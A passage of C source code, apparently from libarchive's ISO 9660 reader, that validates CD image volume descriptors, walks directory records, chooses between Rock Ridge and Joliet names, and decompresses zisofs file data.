if (memcmp(p + 1, "CD001", 5) != 0)
return (0);
if (isPVD(iso9660, p))
continue;
if (!iso9660->joliet.location) {
if (isJolietSVD(iso9660, p))
continue;
}
if (isBootRecord(iso9660, p))
continue;
if (isEVD(iso9660, p))
continue;
if (isSVD(iso9660, p))
continue;
if (isVolumePartition(iso9660, p))
continue;
if (isVDSetTerminator(iso9660, p)) {
seenTerminator = 1;
break;
}
return (0);
}
/*
* ISO 9660 format must have Primary Volume Descriptor and
* Volume Descriptor Set Terminator.
*/
if (seenTerminator && iso9660->primary.location > 16)
return (48);
/* We didn't find a valid PVD; return a bid of zero. */
return (0);
}
static int
archive_read_format_iso9660_options(struct archive_read *a,
const char *key, const char *val)
{
struct iso9660 *iso9660;
iso9660 = (struct iso9660 *)(a->format->data);
if (strcmp(key, "joliet") == 0) {
if (val == NULL || strcmp(val, "off") == 0 ||
strcmp(val, "ignore") == 0 ||
strcmp(val, "disable") == 0 ||
strcmp(val, "0") == 0)
iso9660->opt_support_joliet = 0;
else
iso9660->opt_support_joliet = 1;
return (ARCHIVE_OK);
}
if (strcmp(key, "rockridge") == 0 ||
strcmp(key, "Rockridge") == 0) {
iso9660->opt_support_rockridge = val != NULL;
return (ARCHIVE_OK);
}
/* Note: The "warn" return is just to inform the options
* supervisor that we didn't handle it. It will generate
* a suitable error if no one used this option. */
return (ARCHIVE_WARN);
}
static int
isNull(struct iso9660 *iso9660, const unsigned char *h, unsigned offset,
unsigned bytes)
{
while (bytes >= sizeof(iso9660->null)) {
if (!memcmp(iso9660->null, h + offset, sizeof(iso9660->null)))
return (0);
offset += sizeof(iso9660->null);
bytes -= sizeof(iso9660->null);
}
if (bytes)
return memcmp(iso9660->null, h + offset, bytes) == 0;
else
return (1);
}
static int
isBootRecord(struct iso9660 *iso9660, const unsigned char *h)
{
(void)iso9660; /* UNUSED */
/* Type of the Volume Descriptor Boot Record must be 0. */
if (h[0] != 0)
return (0);
/* Volume Descriptor Version must be 1. */
if (h[6] != 1)
return (0);
return (1);
}
static int
isVolumePartition(struct iso9660 *iso9660, const unsigned char *h)
{
int32_t location;
/* Type of the Volume Partition Descriptor must be 3. */
if (h[0] != 3)
return (0);
/* Volume Descriptor Version must be 1. */
if (h[6] != 1)
return (0);
/* Unused Field */
if (h[7] != 0)
return (0);
location = archive_le32dec(h + 72);
if (location <= SYSTEM_AREA_BLOCK ||
location >= iso9660->volume_block)
return (0);
if ((uint32_t)location != archive_be32dec(h + 76))
return (0);
return (1);
}
static int
isVDSetTerminator(struct iso9660 *iso9660, const unsigned char *h)
{
(void)iso9660; /* UNUSED */
/* Type of the Volume Descriptor Set Terminator must be 255. */
if (h[0] != 255)
return (0);
/* Volume Descriptor Version must be 1. */
if (h[6] != 1)
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, 7, 2048-7))
return (0);
return (1);
}
static int
isJolietSVD(struct iso9660 *iso9660, const unsigned char *h)
{
const unsigned char *p;
ssize_t logical_block_size;
int32_t volume_block;
/* Check if current sector is a kind of Supplementary Volume
* Descriptor. */
if (!isSVD(iso9660, h))
return (0);
/* FIXME: do more validations according to joliet spec. */
/* check if this SVD contains joliet extension! */
p = h + SVD_escape_sequences_offset;
/* N.B. Joliet spec says p[1] == '\\', but.... */
if (p[0] == '%' && p[1] == '/') {
int level = 0;
if (p[2] == '@')
level = 1;
else if (p[2] == 'C')
level = 2;
else if (p[2] == 'E')
level = 3;
else /* not joliet */
return (0);
iso9660->seenJoliet = level;
} else /* not joliet */
return (0);
logical_block_size =
archive_le16dec(h + SVD_logical_block_size_offset);
volume_block = archive_le32dec(h + SVD_volume_space_size_offset);
iso9660->logical_block_size = logical_block_size;
iso9660->volume_block = volume_block;
iso9660->volume_size = logical_block_size * (uint64_t)volume_block;
/* Read Root Directory Record in Volume Descriptor. */
p = h + SVD_root_directory_record_offset;
iso9660->joliet.location = archive_le32dec(p + DR_extent_offset);
iso9660->joliet.size = archive_le32dec(p + DR_size_offset);
return (48);
}
static int
isSVD(struct iso9660 *iso9660, const unsigned char *h)
{
const unsigned char *p;
ssize_t logical_block_size;
int32_t volume_block;
int32_t location;
(void)iso9660; /* UNUSED */
/* Type 2 means it's a SVD. */
if (h[SVD_type_offset] != 2)
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, SVD_reserved1_offset, SVD_reserved1_size))
return (0);
if (!isNull(iso9660, h, SVD_reserved2_offset, SVD_reserved2_size))
return (0);
if (!isNull(iso9660, h, SVD_reserved3_offset, SVD_reserved3_size))
return (0);
/* File structure version must be 1 for ISO9660/ECMA119. */
if (h[SVD_file_structure_version_offset] != 1)
return (0);
logical_block_size =
archive_le16dec(h + SVD_logical_block_size_offset);
if (logical_block_size <= 0)
return (0);
volume_block = archive_le32dec(h + SVD_volume_space_size_offset);
if (volume_block <= SYSTEM_AREA_BLOCK+4)
return (0);
/* Location of Occurrence of Type L Path Table must be
* available location,
* >= SYSTEM_AREA_BLOCK(16) + 2 and < Volume Space Size. */
location = archive_le32dec(h+SVD_type_L_path_table_offset);
if (location < SYSTEM_AREA_BLOCK+2 || location >= volume_block)
return (0);
/* The Type M Path Table must be at a valid location (WinISO
* and probably other programs omit this, so we allow zero)
*
* >= SYSTEM_AREA_BLOCK(16) + 2 and < Volume Space Size. */
location = archive_be32dec(h+SVD_type_M_path_table_offset);
if ((location > 0 && location < SYSTEM_AREA_BLOCK+2)
|| location >= volume_block)
return (0);
/* Read Root Directory Record in Volume Descriptor. */
p = h + SVD_root_directory_record_offset;
if (p[DR_length_offset] != 34)
return (0);
return (48);
}
static int
isEVD(struct iso9660 *iso9660, const unsigned char *h)
{
const unsigned char *p;
ssize_t logical_block_size;
int32_t volume_block;
int32_t location;
(void)iso9660; /* UNUSED */
/* Type of the Enhanced Volume Descriptor must be 2. */
if (h[PVD_type_offset] != 2)
return (0);
/* EVD version must be 2. */
if (h[PVD_version_offset] != 2)
return (0);
/* Reserved field must be 0. */
if (h[PVD_reserved1_offset] != 0)
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, PVD_reserved2_offset, PVD_reserved2_size))
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, PVD_reserved3_offset, PVD_reserved3_size))
return (0);
/* Logical block size must be > 0. */
/* I've looked at Ecma 119 and can't find any stronger
* restriction on this field. */
logical_block_size =
archive_le16dec(h + PVD_logical_block_size_offset);
if (logical_block_size <= 0)
return (0);
volume_block =
archive_le32dec(h + PVD_volume_space_size_offset);
if (volume_block <= SYSTEM_AREA_BLOCK+4)
return (0);
/* File structure version must be 2 for ISO9660:1999. */
if (h[PVD_file_structure_version_offset] != 2)
return (0);
/* Location of Occurrence of Type L Path Table must be
* available location,
* >= SYSTEM_AREA_BLOCK(16) + 2 and < Volume Space Size. */
location = archive_le32dec(h+PVD_type_1_path_table_offset);
if (location < SYSTEM_AREA_BLOCK+2 || location >= volume_block)
return (0);
/* Location of Occurrence of Type M Path Table must be
* available location,
* >= SYSTEM_AREA_BLOCK(16) + 2 and < Volume Space Size. */
location = archive_be32dec(h+PVD_type_m_path_table_offset);
if ((location > 0 && location < SYSTEM_AREA_BLOCK+2)
|| location >= volume_block)
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, PVD_reserved4_offset, PVD_reserved4_size))
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, PVD_reserved5_offset, PVD_reserved5_size))
return (0);
/* Read Root Directory Record in Volume Descriptor. */
p = h + PVD_root_directory_record_offset;
if (p[DR_length_offset] != 34)
return (0);
return (48);
}
static int
isPVD(struct iso9660 *iso9660, const unsigned char *h)
{
const unsigned char *p;
ssize_t logical_block_size;
int32_t volume_block;
int32_t location;
int i;
/* Type of the Primary Volume Descriptor must be 1. */
if (h[PVD_type_offset] != 1)
return (0);
/* PVD version must be 1. */
if (h[PVD_version_offset] != 1)
return (0);
/* Reserved field must be 0. */
if (h[PVD_reserved1_offset] != 0)
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, PVD_reserved2_offset, PVD_reserved2_size))
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, PVD_reserved3_offset, PVD_reserved3_size))
return (0);
/* Logical block size must be > 0. */
/* I've looked at Ecma 119 and can't find any stronger
* restriction on this field. */
logical_block_size =
archive_le16dec(h + PVD_logical_block_size_offset);
if (logical_block_size <= 0)
return (0);
volume_block = archive_le32dec(h + PVD_volume_space_size_offset);
if (volume_block <= SYSTEM_AREA_BLOCK+4)
return (0);
/* File structure version must be 1 for ISO9660/ECMA119. */
if (h[PVD_file_structure_version_offset] != 1)
return (0);
/* Location of Occurrence of Type L Path Table must be
* available location,
* > SYSTEM_AREA_BLOCK(16) + 2 and < Volume Space Size. */
location = archive_le32dec(h+PVD_type_1_path_table_offset);
if (location < SYSTEM_AREA_BLOCK+2 || location >= volume_block)
return (0);
/* The Type M Path Table must also be at a valid location
* (although ECMA 119 requires a Type M Path Table, WinISO and
* probably other programs omit it, so we permit a zero here)
*
* >= SYSTEM_AREA_BLOCK(16) + 2 and < Volume Space Size. */
location = archive_be32dec(h+PVD_type_m_path_table_offset);
if ((location > 0 && location < SYSTEM_AREA_BLOCK+2)
|| location >= volume_block)
return (0);
/* Reserved field must be 0. */
/* But accept NetBSD/FreeBSD "makefs" images with 0x20 here. */
for (i = 0; i < PVD_reserved4_size; ++i)
if (h[PVD_reserved4_offset + i] != 0
&& h[PVD_reserved4_offset + i] != 0x20)
return (0);
/* Reserved field must be 0. */
if (!isNull(iso9660, h, PVD_reserved5_offset, PVD_reserved5_size))
return (0);
/* XXX TODO: Check other values for sanity; reject more
* malformed PVDs. XXX */
/* Read Root Directory Record in Volume Descriptor. */
p = h + PVD_root_directory_record_offset;
if (p[DR_length_offset] != 34)
return (0);
if (!iso9660->primary.location) {
iso9660->logical_block_size = logical_block_size;
iso9660->volume_block = volume_block;
iso9660->volume_size =
logical_block_size * (uint64_t)volume_block;
iso9660->primary.location =
archive_le32dec(p + DR_extent_offset);
iso9660->primary.size = archive_le32dec(p + DR_size_offset);
}
return (48);
}
static int
read_children(struct archive_read *a, struct file_info *parent)
{
struct iso9660 *iso9660;
const unsigned char *b, *p;
struct file_info *multi;
size_t step, skip_size;
iso9660 = (struct iso9660 *)(a->format->data);
/* flush any remaining bytes from the last round to ensure
* we're positioned */
if (iso9660->entry_bytes_unconsumed) {
__archive_read_consume(a, iso9660->entry_bytes_unconsumed);
iso9660->entry_bytes_unconsumed = 0;
}
if (iso9660->current_position > parent->offset) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Ignoring out-of-order directory (%s) %jd > %jd",
parent->name.s,
(intmax_t)iso9660->current_position,
(intmax_t)parent->offset);
return (ARCHIVE_WARN);
}
if (parent->offset + parent->size > iso9660->volume_size) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Directory is beyond end-of-media: %s",
parent->name.s);
return (ARCHIVE_WARN);
}
if (iso9660->current_position < parent->offset) {
int64_t skipsize;
skipsize = parent->offset - iso9660->current_position;
skipsize = __archive_read_consume(a, skipsize);
if (skipsize < 0)
return ((int)skipsize);
iso9660->current_position = parent->offset;
}
step = (size_t)(((parent->size + iso9660->logical_block_size -1) /
iso9660->logical_block_size) * iso9660->logical_block_size);
b = __archive_read_ahead(a, step, NULL);
if (b == NULL) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Failed to read full block when scanning "
"ISO9660 directory list");
return (ARCHIVE_FATAL);
}
iso9660->current_position += step;
multi = NULL;
skip_size = step;
while (step) {
p = b;
b += iso9660->logical_block_size;
step -= iso9660->logical_block_size;
for (; *p != 0 && p < b && p + *p <= b; p += *p) {
struct file_info *child;
/* N.B.: these special directory identifiers
* are 8 bit "values" even on a
* Joliet CD with UCS-2 (16bit) encoding.
*/
/* Skip '.' entry. */
if (*(p + DR_name_len_offset) == 1
&& *(p + DR_name_offset) == '\0')
continue;
/* Skip '..' entry. */
if (*(p + DR_name_len_offset) == 1
&& *(p + DR_name_offset) == '\001')
continue;
child = parse_file_info(a, parent, p);
if (child == NULL) {
__archive_read_consume(a, skip_size);
return (ARCHIVE_FATAL);
}
if (child->cl_offset == 0 &&
(child->multi_extent || multi != NULL)) {
struct content *con;
if (multi == NULL) {
multi = child;
multi->contents.first = NULL;
multi->contents.last =
&(multi->contents.first);
}
con = malloc(sizeof(struct content));
if (con == NULL) {
archive_set_error(
&a->archive, ENOMEM,
"No memory for multi extent");
__archive_read_consume(a, skip_size);
return (ARCHIVE_FATAL);
}
con->offset = child->offset;
con->size = child->size;
con->next = NULL;
*multi->contents.last = con;
multi->contents.last = &(con->next);
if (multi == child) {
if (add_entry(a, iso9660, child)
!= ARCHIVE_OK)
return (ARCHIVE_FATAL);
} else {
multi->size += child->size;
if (!child->multi_extent)
multi = NULL;
}
} else
if (add_entry(a, iso9660, child) != ARCHIVE_OK)
return (ARCHIVE_FATAL);
}
}
__archive_read_consume(a, skip_size);
/* Read data which recorded by RRIP "CE" extension. */
if (read_CE(a, iso9660) != ARCHIVE_OK)
return (ARCHIVE_FATAL);
return (ARCHIVE_OK);
}
static int
choose_volume(struct archive_read *a, struct iso9660 *iso9660)
{
struct file_info *file;
int64_t skipsize;
struct vd *vd;
const void *block;
char seenJoliet;
vd = &(iso9660->primary);
if (!iso9660->opt_support_joliet)
iso9660->seenJoliet = 0;
if (iso9660->seenJoliet &&
vd->location > iso9660->joliet.location)
/* This condition is unlikely; by way of caution. */
vd = &(iso9660->joliet);
skipsize = LOGICAL_BLOCK_SIZE * vd->location;
skipsize = __archive_read_consume(a, skipsize);
if (skipsize < 0)
return ((int)skipsize);
iso9660->current_position = skipsize;
block = __archive_read_ahead(a, vd->size, NULL);
if (block == NULL) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Failed to read full block when scanning "
"ISO9660 directory list");
return (ARCHIVE_FATAL);
}
/*
* While reading Root Directory, flag seenJoliet must be zero to
* avoid converting special name 0x00(Current Directory) and
* next byte to UCS2.
*/
seenJoliet = iso9660->seenJoliet;/* Save flag. */
iso9660->seenJoliet = 0;
file = parse_file_info(a, NULL, block);
if (file == NULL)
return (ARCHIVE_FATAL);
iso9660->seenJoliet = seenJoliet;
/*
* If the iso image has both RockRidge and Joliet, we preferentially
* use RockRidge Extensions rather than Joliet ones.
*/
if (vd == &(iso9660->primary) && iso9660->seenRockridge
&& iso9660->seenJoliet)
iso9660->seenJoliet = 0;
if (vd == &(iso9660->primary) && !iso9660->seenRockridge
&& iso9660->seenJoliet) {
/* Switch reading data from primary to joliet. */
vd = &(iso9660->joliet);
skipsize = LOGICAL_BLOCK_SIZE * vd->location;
skipsize -= iso9660->current_position;
skipsize = __archive_read_consume(a, skipsize);
if (skipsize < 0)
return ((int)skipsize);
iso9660->current_position += skipsize;
block = __archive_read_ahead(a, vd->size, NULL);
if (block == NULL) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Failed to read full block when scanning "
"ISO9660 directory list");
return (ARCHIVE_FATAL);
}
iso9660->seenJoliet = 0;
file = parse_file_info(a, NULL, block);
if (file == NULL)
return (ARCHIVE_FATAL);
iso9660->seenJoliet = seenJoliet;
}
/* Store the root directory in the pending list. */
if (add_entry(a, iso9660, file) != ARCHIVE_OK)
return (ARCHIVE_FATAL);
if (iso9660->seenRockridge) {
a->archive.archive_format = ARCHIVE_FORMAT_ISO9660_ROCKRIDGE;
a->archive.archive_format_name =
"ISO9660 with Rockridge extensions";
}
return (ARCHIVE_OK);
}
static int
archive_read_format_iso9660_read_header(struct archive_read *a,
struct archive_entry *entry)
{
struct iso9660 *iso9660;
struct file_info *file;
int r, rd_r = ARCHIVE_OK;
iso9660 = (struct iso9660 *)(a->format->data);
if (!a->archive.archive_format) {
a->archive.archive_format = ARCHIVE_FORMAT_ISO9660;
a->archive.archive_format_name = "ISO9660";
}
if (iso9660->current_position == 0) {
r = choose_volume(a, iso9660);
if (r != ARCHIVE_OK)
return (r);
}
file = NULL;/* Eliminate a warning. */
/* Get the next entry that appears after the current offset. */
r = next_entry_seek(a, iso9660, &file);
if (r != ARCHIVE_OK)
return (r);
if (iso9660->seenJoliet) {
/*
* Convert UTF-16BE of a filename to local locale MBS
* and store the result into a filename field.
*/
if (iso9660->sconv_utf16be == NULL) {
iso9660->sconv_utf16be =
archive_string_conversion_from_charset(
&(a->archive), "UTF-16BE", 1);
if (iso9660->sconv_utf16be == NULL)
/* Coundn't allocate memory */
return (ARCHIVE_FATAL);
}
if (iso9660->utf16be_path == NULL) {
iso9660->utf16be_path = malloc(UTF16_NAME_MAX);
if (iso9660->utf16be_path == NULL) {
archive_set_error(&a->archive, ENOMEM,
"No memory");
return (ARCHIVE_FATAL);
}
}
if (iso9660->utf16be_previous_path == NULL) {
iso9660->utf16be_previous_path = malloc(UTF16_NAME_MAX);
if (iso9660->utf16be_previous_path == NULL) {
archive_set_error(&a->archive, ENOMEM,
"No memory");
return (ARCHIVE_FATAL);
}
}
iso9660->utf16be_path_len = 0;
if (build_pathname_utf16be(iso9660->utf16be_path,
UTF16_NAME_MAX, &(iso9660->utf16be_path_len), file) != 0) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Pathname is too long");
return (ARCHIVE_FATAL);
}
r = archive_entry_copy_pathname_l(entry,
(const char *)iso9660->utf16be_path,
iso9660->utf16be_path_len,
iso9660->sconv_utf16be);
if (r != 0) {
if (errno == ENOMEM) {
archive_set_error(&a->archive, ENOMEM,
"No memory for Pathname");
return (ARCHIVE_FATAL);
}
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Pathname cannot be converted "
"from %s to current locale.",
archive_string_conversion_charset_name(
iso9660->sconv_utf16be));
rd_r = ARCHIVE_WARN;
}
} else {
const char *path = build_pathname(&iso9660->pathname, file, 0);
if (path == NULL) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Pathname is too long");
return (ARCHIVE_FATAL);
} else {
archive_string_empty(&iso9660->pathname);
archive_entry_set_pathname(entry, path);
}
}
iso9660->entry_bytes_remaining = file->size;
/* Offset for sparse-file-aware clients. */
iso9660->entry_sparse_offset = 0;
if (file->offset + file->size > iso9660->volume_size) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"File is beyond end-of-media: %s",
archive_entry_pathname(entry));
iso9660->entry_bytes_remaining = 0;
return (ARCHIVE_WARN);
}
/* Set up the entry structure with information about this entry. */
archive_entry_set_mode(entry, file->mode);
archive_entry_set_uid(entry, file->uid);
archive_entry_set_gid(entry, file->gid);
archive_entry_set_nlink(entry, file->nlinks);
if (file->birthtime_is_set)
archive_entry_set_birthtime(entry, file->birthtime, 0);
else
archive_entry_unset_birthtime(entry);
archive_entry_set_mtime(entry, file->mtime, 0);
archive_entry_set_ctime(entry, file->ctime, 0);
archive_entry_set_atime(entry, file->atime, 0);
/* N.B.: Rock Ridge supports 64-bit device numbers. */
archive_entry_set_rdev(entry, (dev_t)file->rdev);
archive_entry_set_size(entry, iso9660->entry_bytes_remaining);
if (file->symlink.s != NULL)
archive_entry_copy_symlink(entry, file->symlink.s);
/* Note: If the input isn't seekable, we can't rewind to
* return the same body again, so if the next entry refers to
* the same data, we have to return it as a hardlink to the
* original entry. */
if (file->number != -1 &&
file->number == iso9660->previous_number) {
if (iso9660->seenJoliet) {
r = archive_entry_copy_hardlink_l(entry,
(const char *)iso9660->utf16be_previous_path,
iso9660->utf16be_previous_path_len,
iso9660->sconv_utf16be);
if (r != 0) {
if (errno == ENOMEM) {
archive_set_error(&a->archive, ENOMEM,
"No memory for Linkname");
return (ARCHIVE_FATAL);
}
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Linkname cannot be converted "
"from %s to current locale.",
archive_string_conversion_charset_name(
iso9660->sconv_utf16be));
rd_r = ARCHIVE_WARN;
}
} else
archive_entry_set_hardlink(entry,
iso9660->previous_pathname.s);
archive_entry_unset_size(entry);
iso9660->entry_bytes_remaining = 0;
return (rd_r);
}
if ((file->mode & AE_IFMT) != AE_IFDIR &&
file->offset < iso9660->current_position) {
int64_t r64;
r64 = __archive_read_seek(a, file->offset, SEEK_SET);
if (r64 != (int64_t)file->offset) {
/* We can't seek backwards to extract it, so issue
* a warning. Note that this can only happen if
* this entry was added to the heap after we passed
* this offset, that is, only if the directory
* mentioning this entry is later than the body of
* the entry. Such layouts are very unusual; most
* ISO9660 writers lay out and record all directory
* information first, then store all file bodies. */
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Ignoring out-of-order file @%jx (%s) %jd < %jd",
(intmax_t)file->number,
iso9660->pathname.s,
(intmax_t)file->offset,
(intmax_t)iso9660->current_position);
iso9660->entry_bytes_remaining = 0;
return (ARCHIVE_WARN);
}
iso9660->current_position = (uint64_t)r64;
}
/* Initialize zisofs variables. */
iso9660->entry_zisofs.pz = file->pz;
if (file->pz) {
#ifdef HAVE_ZLIB_H
struct zisofs *zisofs;
zisofs = &iso9660->entry_zisofs;
zisofs->initialized = 0;
zisofs->pz_log2_bs = file->pz_log2_bs;
zisofs->pz_uncompressed_size = file->pz_uncompressed_size;
zisofs->pz_offset = 0;
zisofs->header_avail = 0;
zisofs->header_passed = 0;
zisofs->block_pointers_avail = 0;
#endif
archive_entry_set_size(entry, file->pz_uncompressed_size);
}
iso9660->previous_number = file->number;
if (iso9660->seenJoliet) {
memcpy(iso9660->utf16be_previous_path, iso9660->utf16be_path,
iso9660->utf16be_path_len);
iso9660->utf16be_previous_path_len = iso9660->utf16be_path_len;
} else
archive_strcpy(
&iso9660->previous_pathname, iso9660->pathname.s);
/* Reset entry_bytes_remaining if the file is multi extent. */
iso9660->entry_content = file->contents.first;
if (iso9660->entry_content != NULL)
iso9660->entry_bytes_remaining = iso9660->entry_content->size;
if (archive_entry_filetype(entry) == AE_IFDIR) {
/* Overwrite nlinks by proper link number which is
* calculated from number of sub directories. */
archive_entry_set_nlink(entry, 2 + file->subdirs);
/* Directory data has been read completely. */
iso9660->entry_bytes_remaining = 0;
}
if (rd_r != ARCHIVE_OK)
return (rd_r);
return (ARCHIVE_OK);
}
static int
archive_read_format_iso9660_read_data_skip(struct archive_read *a)
{
/* Because read_next_header always does an explicit skip
* to the next entry, we don't need to do anything here. */
(void)a; /* UNUSED */
return (ARCHIVE_OK);
}
#ifdef HAVE_ZLIB_H
static int
zisofs_read_data(struct archive_read *a,
const void **buff, size_t *size, int64_t *offset)
{
struct iso9660 *iso9660;
struct zisofs *zisofs;
const unsigned char *p;
size_t avail;
ssize_t bytes_read;
size_t uncompressed_size;
int r;
iso9660 = (struct iso9660 *)(a->format->data);
zisofs = &iso9660->entry_zisofs;
p = __archive_read_ahead(a, 1, &bytes_read);
if (bytes_read <= 0) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_FILE_FORMAT,
"Truncated zisofs file body");
return (ARCHIVE_FATAL);
}
if (bytes_read > iso9660->entry_bytes_remaining)
bytes_read = (ssize_t)iso9660->entry_bytes_remaining;
avail = bytes_read;
uncompressed_size = 0;
if (!zisofs->initialized) {
size_t ceil, xsize;
/* Allocate block pointers buffer. */
ceil = (size_t)((zisofs->pz_uncompressed_size +
(((int64_t)1) << zisofs->pz_log2_bs) - 1)
>> zisofs->pz_log2_bs);
xsize = (ceil + 1) * 4;
if (zisofs->block_pointers_alloc < xsize) {
size_t alloc;
if (zisofs->block_pointers != NULL)
free(zisofs->block_pointers);
alloc = ((xsize >> 10) + 1) << 10;
zisofs->block_pointers = malloc(alloc);
if (zisofs->block_pointers == NULL) {
archive_set_error(&a->archive, ENOMEM,
"No memory for zisofs decompression");
return (ARCHIVE_FATAL);
}
zisofs->block_pointers_alloc = alloc;
}
zisofs->block_pointers_size = xsize;
/* Allocate uncompressed data buffer. */
xsize = (size_t)1UL << zisofs->pz_log2_bs;
if (zisofs->uncompressed_buffer_size < xsize) {
if (zisofs->uncompressed_buffer != NULL)
free(zisofs->uncompressed_buffer);
zisofs->uncompressed_buffer = malloc(xsize);
if (zisofs->uncompressed_buffer == NULL) {
archive_set_error(&a->archive, ENOMEM,
"No memory for zisofs decompression");
return (ARCHIVE_FATAL);
}
}
zisofs->uncompressed_buffer_size = xsize;
/*
* Read the file header, and check the magic code of zisofs.
*/
if (zisofs->header_avail < sizeof(zisofs->header)) {
xsize = sizeof(zisofs->header) - zisofs->header_avail;
if (avail < xsize)
xsize = avail;
memcpy(zisofs->header + zisofs->header_avail, p, xsize);
zisofs->header_avail += xsize;
avail -= xsize;
p += xsize;
}
if (!zisofs->header_passed &&
zisofs->header_avail == sizeof(zisofs->header)) {
int err = 0;
if (memcmp(zisofs->header, zisofs_magic,
sizeof(zisofs_magic)) != 0)
err = 1;
if (archive_le32dec(zisofs->header + 8)
!= zisofs->pz_uncompressed_size)
err = 1;
if (zisofs->header[12] != 4)
err = 1;
if (zisofs->header[13] != zisofs->pz_log2_bs)
err = 1;
if (err) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Illegal zisofs file body");
return (ARCHIVE_FATAL);
}
zisofs->header_passed = 1;
}
/*
* Read block pointers.
*/
if (zisofs->header_passed &&
zisofs->block_pointers_avail < zisofs->block_pointers_size) {
xsize = zisofs->block_pointers_size
- zisofs->block_pointers_avail;
if (avail < xsize)
xsize = avail;
memcpy(zisofs->block_pointers
+ zisofs->block_pointers_avail, p, xsize);
zisofs->block_pointers_avail += xsize;
avail -= xsize;
p += xsize;
if (zisofs->block_pointers_avail
== zisofs->block_pointers_size) {
/* We've got all block pointers and initialize
* related variables. */
zisofs->block_off = 0;
zisofs->block_avail = 0;
/* Complete a initialization */
zisofs->initialized = 1;
}
}
if (!zisofs->initialized)
goto next_data; /* We need more data. */
}
/*
* Get block offsets from block pointers.
*/
if (zisofs->block_avail == 0) {
uint32_t bst, bed;
if (zisofs->block_off + 4 >= zisofs->block_pointers_size) {
/* There isn't a pair of offsets. */
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Illegal zisofs block pointers");
return (ARCHIVE_FATAL);
}
bst = archive_le32dec(
zisofs->block_pointers + zisofs->block_off);
if (bst != zisofs->pz_offset + (bytes_read - avail)) {
/* TODO: Should we seek offset of current file
* by bst ? */
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Illegal zisofs block pointers(cannot seek)");
return (ARCHIVE_FATAL);
}
bed = archive_le32dec(
zisofs->block_pointers + zisofs->block_off + 4);
if (bed < bst) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Illegal zisofs block pointers");
return (ARCHIVE_FATAL);
}
zisofs->block_avail = bed - bst;
zisofs->block_off += 4;
/* Initialize compression library for new block. */
if (zisofs->stream_valid)
r = inflateReset(&zisofs->stream);
else
r = inflateInit(&zisofs->stream);
if (r != Z_OK) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Can't initialize zisofs decompression.");
return (ARCHIVE_FATAL);
}
zisofs->stream_valid = 1;
zisofs->stream.total_in = 0;
zisofs->stream.total_out = 0;
}
/*
* Make uncompressed data.
*/
if (zisofs->block_avail == 0) {
memset(zisofs->uncompressed_buffer, 0,
zisofs->uncompressed_buffer_size);
uncompressed_size = zisofs->uncompressed_buffer_size;
} else {
zisofs->stream.next_in = (Bytef *)(uintptr_t)(const void *)p;
if (avail > zisofs->block_avail)
zisofs->stream.avail_in = zisofs->block_avail;
else
zisofs->stream.avail_in = (uInt)avail;
zisofs->stream.next_out = zisofs->uncompressed_buffer;
zisofs->stream.avail_out =
(uInt)zisofs->uncompressed_buffer_size;
r = inflate(&zisofs->stream, 0);
switch (r) {
case Z_OK: /* Decompressor made some progress.*/
case Z_STREAM_END: /* Found end of stream. */
break;
default:
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"zisofs decompression failed (%d)", r);
return (ARCHIVE_FATAL);
}
uncompressed_size =
zisofs->uncompressed_buffer_size - zisofs->stream.avail_out;
avail -= zisofs->stream.next_in - p;
zisofs->block_avail -= (uint32_t)(zisofs->stream.next_in - p);
}
next_data:
bytes_read -= avail;
*buff = zisofs->uncompressed_buffer;
*size = uncompressed_size;
*offset = iso9660->entry_sparse_offset;
iso9660->entry_sparse_offset += uncompressed_size;
iso9660->entry_bytes_remaining -= bytes_read;
iso9660->current_position += bytes_read;
zisofs->pz_offset += (uint32_t)bytes_read;
iso9660->entry_bytes_unconsumed += bytes_read;
return (ARCHIVE_OK);
}
#else /* HAVE_ZLIB_H */
static int
zisofs_read_data(struct archive_read *a,
const void **buff, size_t *size, int64_t *offset)
{
(void)buff;/* UNUSED */
(void)size;/* UNUSED */
(void)offset;/* UNUSED */
archive_set_error(&a->archive, ARCHIVE_ERRNO_FILE_FORMAT,
"zisofs is not supported on this platform.");
return (ARCHIVE_FAILED);
}
#endif /* HAVE_ZLIB_H */
static int
archive_read_format_iso9660_read_data(struct archive_read *a,
const void **buff, size_t *size, int64_t *offset)
{
ssize_t bytes_read;
struct iso9660 *iso9660;
iso9660 = (struct iso9660 *)(a->format->data);
if (iso9660->entry_bytes_unconsumed) {
__archive_read_consume(a, iso9660->entry_bytes_unconsumed);
iso9660->entry_bytes_unconsumed = 0;
}
if (iso9660->entry_bytes_remaining <= 0) {
if (iso9660->entry_content != NULL)
iso9660->entry_content = iso9660->entry_content->next;
if (iso9660->entry_content == NULL) {
*buff = NULL;
*size = 0;
*offset = iso9660->entry_sparse_offset;
return (ARCHIVE_EOF);
}
/* Seek forward to the start of the entry. */
if (iso9660->current_position < iso9660->entry_content->offset) {
int64_t step;
step = iso9660->entry_content->offset -
iso9660->current_position;
step = __archive_read_consume(a, step);
